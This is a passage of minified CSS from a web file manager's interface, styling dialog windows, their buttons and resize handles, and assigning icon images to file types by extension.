!important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none 